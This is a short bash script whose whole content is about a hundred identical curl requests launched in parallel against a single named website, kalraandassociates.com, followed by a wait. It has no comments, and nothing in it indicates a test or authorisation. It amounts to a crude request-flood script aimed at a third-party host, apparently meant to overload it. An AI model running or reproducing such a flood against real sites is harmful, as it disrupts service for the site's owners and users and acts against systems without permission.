#!/bin/bash
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
curl "http://kalraandassociates.com/10" &
wait